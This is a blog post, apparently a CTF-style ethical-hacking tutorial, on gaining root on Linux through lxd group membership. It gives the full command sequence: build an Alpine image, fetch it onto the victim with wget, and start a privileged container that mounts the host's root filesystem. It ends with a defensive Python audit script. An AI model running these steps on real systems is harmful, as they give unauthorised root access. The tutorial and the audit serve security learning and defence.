What is LXC & LXD | How to escalate privileges using LXD in linux systems

FreakyDodo
4 min read · Mar 14, 2022


Hey Hackers!!!

In this blog we will discuss how an account on a Linux system that is a member of the lxd group can escalate to root privileges by exploiting the features of LXD.

Before we begin with privilege escalation it is important to scratch the surface of LXC and LXD. Getting familiar with what we are working on will give us enough opportunities to escalate privileges and also widen the possible methodologies beyond the one we discuss in this blog.

What is LXC & LXD?

LXC and LXD are primarily classified as “Virtual Machine Platforms & Containers” tools.

Linux Containers (LXC) is often considered a lightweight virtualization technology that sits somewhere between a chroot and a fully developed virtual machine: it creates an environment as close as possible to a Linux installation but without the need for a separate kernel.

Linux daemon (LXD) is the “lightervisor”, or lightweight container hypervisor. LXD builds on top of a container technology called LXC, which Docker used earlier. It uses the stable LXC API to do all the container management behind the scenes, adding a REST API on top and providing a much simpler, more consistent user experience.

A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.

Privilege Escalation Technique

Now that we have basic knowledge of the tech we are working with, let's clone “build-alpine” onto our local machine.

To do so, type the command below:

git clone https://github.com/saghul/lxd-alpine-builder.git

Once you are done cloning the repo, change into the directory you cloned using the command below:

cd lxd-alpine-builder

Now execute the script:

./build-alpine

Once the execution is complete you will get a compressed archive in the folder you are currently working in. We will need to transfer this archive to the host machine (the victim machine).

In order to transfer the file we can start a Python HTTP server on the local machine and request the file from the victim machine.

python -m SimpleHTTPServer

It's time to get the file onto the host machine. Change directory to “/tmp”, as you might not have the privileges to download files into other directories, and wget the file from there. The commands below will help you do so.

cd /tmp

wget http://10.17.26.97:8000/apline-v3.15-x86_64-20220314_0607.tar.gz

Note: Make sure you change the IP address to your local machine's IP and use the actual file name produced by the build.

Once we have the file on the host machine, let's import it and use it as an image:

lxc image import ./apline-v3.15-x86_64-20220314_0607.tar.gz --alias myimage

Now let's list the images using the following command:

lxc image list

If everything works fine, you will get output similar to the picture above, with “myimage” listed.

Now that our image is ready, let's configure it and get our privileges escalated. Simply type the commands below:

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

id

If you have performed all the steps correctly, the last command (i.e. id) should report root.

Once you have the desired output, the host's root filesystem is available under /mnt/root inside the container (the disk device added above), and from there you should get your flag.
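From the defender's side, the two things worth auditing are exactly what the post relies on: membership of the lxd group (which is effectively root, as noted earlier) and instances that combine security.privileged=true with a disk device whose source is the host's “/” (the configuration the lxc init and lxc config device add commands above create). The script below is an added example, not part of the original post or of LXD itself; it parses constructed sample /etc/group text and constructed sample output shaped like lxc list --format json, so it runs offline, and the assumed container and device names are taken from the commands above.

```python
"""Audit helpers for the LXD host-root-mount pattern (added example)."""
import json

# Constructed sample of /etc/group content.
SAMPLE_GROUP_FILE = "root:x:0:\nsudo:x:27:alice\nlxd:x:110:alice,bob\n"

# Constructed sample modelled on `lxc list --format json`; the container
# name "ignite" and device "mydevice" come from the post's commands.
SAMPLE_LXC_LIST = json.dumps([
    {"name": "ignite", "status": "Running",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {"mydevice": {"type": "disk", "source": "/",
                                       "path": "/mnt/root", "recursive": "true"}}},
    {"name": "web", "status": "Running", "expanded_config": {},
     "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
])


def lxd_group_members(group_file_text: str) -> list:
    """Return the usernames listed in the lxd group of an /etc/group file."""
    for line in group_file_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lxd":
            return [u for u in fields[3].split(",") if u]
    return []


def risky_containers(lxc_list_json: str) -> list:
    """Return [(name, reasons)] for instances that can expose the host root.

    expanded_* fields include settings inherited from profiles, so a
    privileged flag or host mount coming from a profile is not missed."""
    findings = []
    for c in json.loads(lxc_list_json):
        config = c.get("expanded_config") or c.get("config") or {}
        devices = c.get("expanded_devices") or c.get("devices") or {}
        reasons = []
        if str(config.get("security.privileged", "")).lower() == "true":
            reasons.append("security.privileged=true")
        for name, dev in devices.items():
            # An instance's own rootfs device has path "/" but no source;
            # a host-root mount has source "/" (bind-mounted at dev["path"]).
            if dev.get("type") == "disk" and dev.get("source") == "/":
                reasons.append(f"disk device '{name}' mounts host / at {dev.get('path')}")
        if reasons:
            findings.append((c["name"], reasons))
    return findings


if __name__ == "__main__":
    print("lxd group members (each is effectively root):", lxd_group_members(SAMPLE_GROUP_FILE))
    for name, reasons in risky_containers(SAMPLE_LXC_LIST):
        print(f"{name}: {'; '.join(reasons)}")
```

To run it against a live host, feed it the contents of /etc/group and the output of lxc list --format json instead of the constructed samples.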

Keep coming for more.

Happy Hacking!!!




Written by FreakyDodo

Hey Hackers !! I am Harshit Dodia aka Freaky Dodo , I am a student of Information Technology and Ethical hacking.
